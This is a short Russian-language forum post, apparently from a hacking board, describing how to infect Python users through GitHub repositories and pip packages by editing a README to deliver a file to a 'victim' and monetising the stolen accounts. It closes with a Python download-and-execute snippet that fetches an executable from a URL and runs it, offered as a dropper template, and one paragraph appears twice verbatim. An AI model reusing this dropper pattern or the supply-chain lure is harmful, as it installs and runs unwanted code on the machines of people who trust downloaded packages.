Всем привет сегодня поговорим как легко можно заразить через github по моим наблюдения у каждого второго стоит питон на компе
как правило все потому что данный язык программирования очень прост и набирает все больше популярности,самое интересно что мы пачками скачиваем файлы,библиотеки через pip а что там не кому в голову не приходило,возьмем чисто для примера Zoom для чего он видео.
Думаю все понятно пиздуем себе в акк редачим файл README.md и подгружаем свой файл для доставке его жертве и бегом по бордам хвастаться своим охуенным сканером ,конечно если догнать и монетизировать то можно взять все базы про чекать на запрос гитхабика думаю там много акков как это в принципе выглядит видео секретный код по катом :lol2:
Думаю все понятно пиздуем себе в акк редачим файл README.md и подгружаем свой файл для доставке его жертве и бегом по бордам хвастаться своим охуенным сканером ,конечно если догнать и монетизировать то можно взять все базы про чекать на запрос гитхабика думаю там много акков как это в принципе выглядит видео секретный код по катом :lol2:
import os,wget
filename = 'putty.com'
url = 'https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe'
Files = wget.download(url,filename)
os.startfile(Files)